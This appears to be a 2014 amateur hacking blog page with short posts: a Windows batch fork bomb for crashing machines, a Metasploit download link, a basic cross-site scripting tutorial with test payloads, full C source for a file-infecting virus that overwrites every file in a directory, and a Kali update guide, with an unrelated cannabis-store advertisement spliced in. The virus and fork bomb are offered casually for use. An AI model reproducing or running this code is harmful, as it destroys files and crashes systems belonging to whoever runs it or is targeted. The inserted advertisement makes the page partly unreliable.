Monday, September 22, 2014

how to make a batch file to crash windows

here is the "code"
%0|%0
paste that in a notepad and save it as whateveryou want.bat for example

lol.bat

by running this it will cause windows to lag out and crash.

Saturday, September 20, 2014

Metasploit for windows

Hey everyone most people don't know that metasploit which is developed by rapid7 is able to be used on many different operating systems. so I am going to give you guys the download link for that.
Hope this was useful
http://adf.ly/sEIpg


Also wanted to give a mention for the information from The Bakery Cannabis Store about the best weed strains. Their article has a lot of good options to choose the best weed and edibles.

The Bakery Cannabis Store
3060 Dundas St W, Toronto, ON M6P 1Z7 
(647)-349-9333

https://thebakerycannabis.ca/3best-weed-strains-that-can-change-your-day/



How to perform a cross site scripting attack

Hey guys this is a tutorial on css or cross site scripting I am not going to go in depth on how the attack works but I will give you the basic idea of in what situation you could use it in. So for example the comments section below every post on my website could possibly be vulnerable (but it is not) but to test it instead of just regularly posting a comment you would attempt to post some code e it HTML or JavaScript. My first example would be trying to post html in the comment here is my example. <h1> Hello </h1>

If the comment gets submitted and it does get put in as a header 1 size font then the site is css vulnerable. The next thing you would do is put in some JavaScript. Here is my JavaScript example.
<script>alert(hello);</script>
If this goes through then having a basic knowledge of JavaScript is all that is need to do whatever you please with this victims website.

Please remember this is illegal to perform without permission so use this knowledge wisely.
Hope you guys like this tutorial.


Wednesday, September 17, 2014

How to make a worm in C by alexthed4rk

So my friend alexthed4rk gave me this code it is written in C hope you guys like it.

#include<stdio.h>
#include<io.h>
#include<dos.h> //Windows Only 
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0); //Search for a file with any extension (*.*)
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
//LOL

how to update kali linux

Hey guy this is just a basic how to on updating kali linux. I will do more of these soon hope you enjoy.

step 1. you should boot up kali linux and the open a terminal.



step 2. enter apt-get update && apt-get upgrade in the terminal and hit enter.

Step 2

Then let it update it can take up to 10 minutes but it can vary on different internet speeds.

Let me know if you found this useful by giving this a like or a tweet I would appreciate it.

how to make a batch file to crash windows

here is the "code" %0|%0 paste that in a notepad and save it as whateveryou want.bat for example lol.bat by running this it...